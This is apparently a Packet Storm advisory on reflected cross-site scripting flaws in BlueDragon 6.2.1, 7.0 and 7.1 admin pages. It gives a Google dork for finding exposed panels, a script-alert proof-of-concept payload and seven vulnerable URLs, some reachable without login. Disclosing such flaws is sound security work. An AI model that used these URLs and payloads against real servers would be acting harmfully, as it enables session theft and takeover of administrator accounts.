BlueDragon versions 6.2.1, 7.0, and 7.1 suffer from multiple cross site scripting vulnerabilities. These are in addition to priorly discovered similar issues in these versions.
34152718c0c5e04b81a0e17e0d27f408dc1c6ce005e485fce24870f32ad785fbI. VULNERABILITY
BlueDragon 6.2.1, 7.0, 7.1 Reflected Cross-Site Scripting
II. SOURCE:
http://www.newatlanta.com/c/products/bluedragon/download/home
III. BACKGROUND
BlueDragon is a family of runtime server-side products for the deployment
of ColdFusion Markup Language (CFML) pages - with native technology
plataform
integration on the operation system web server anda database of your choice.
IV. NEW ATLANTA BUG TRACKING VULNERABILITY ID
# 3435
VI. VENDOR RESPONSE
V. TECHNICAL DETAILS
# Exploit Title: BlueDragon Enterprise Server Multiple XSS Vulnerabilities
# Google Dork: "BlueDragon Administration"
# Date: 21/07/2015
# Author: www.newatlanta.com
# Software Link: www.newatlanta.com/bluedragon/
# Version: 6.2.1, 7.0, 7.1
# Exploit Discovered : Glaysson Santos
# Website : di9jun9.blogspot.com
To reproduce this Flaw, put javascript XSS Payload
(i.e:"><script>alert("0cn1")</script>)
in the "XSS" bellow:
- without authentication
http://[TARGET]/bluedragon/admin.cfm?MESSAGE=XSS
http://[TARGET]/bluedragon/login.cfm?MESSAGE=XSS
- authenticated - affected scripts
http://
[TARGET:PORT]/bluedragon/admin/collectionIndex.cfm?CollectionName=test.col&CollectionLanguage=XSS
http://
[TARGET:PORT]/bluedragon/admin/caching.cfm?MESSAGE=XSS&ACTION=FLUSHFILECACHE
http://
[TARGET:PORT]/bluedragon/admin/cfmapping_edit.cfm?STATUS=NOK&MESSAGE=XSS&ID=1&DNAME=/c:&isGlobal=XSS
http://[TARGET:PORT]/bluedragon/admin/font.cfm?STATUS=OK&MESSAGE=XSS
http://[TARGET:PORT]/bluedragon/admin/datasources_wizard1.cfm?MESSAGE=XSS
The javascript will execute and display "0cn1"
Greetings
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed